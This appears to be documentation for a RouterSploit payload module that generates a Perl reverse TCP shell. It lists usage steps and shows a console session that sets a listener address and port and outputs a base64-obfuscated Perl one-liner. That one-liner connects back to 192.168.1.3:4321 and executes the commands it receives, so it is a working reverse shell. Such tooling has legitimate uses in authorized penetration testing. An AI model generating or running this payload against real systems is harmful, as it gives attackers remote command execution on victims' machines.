## Description

Module generates payload that creates interactive tcp reverse shell by using perl one-liner. 

## Verification Steps

  1. Start `./rsf.py`
  2. Do: `use payloads/cmd/perl_reverse_tcp`
  3. Do: `set lhost 192.168.1.3`
  4. Do: `set lport 4321`
  5. Do: `run`
  6. Module generates perl tcp reverse shell payload

## Scenarios

```
rsf > use payloads/cmd/perl_reverse_tcp
rsf (Perl Reverse TCP One-Liner) > set lhost 192.168.1.3
[+] lhost => 192.168.1.3
rsf (Perl Reverse TCP One-Liner) > set lport 4321
[+] lport => 4321
rsf (Perl Reverse TCP One-Liner) > run
[*] Running module...
[*] Generating payload
perl -MIO -e "use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuMzo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow=='));"
```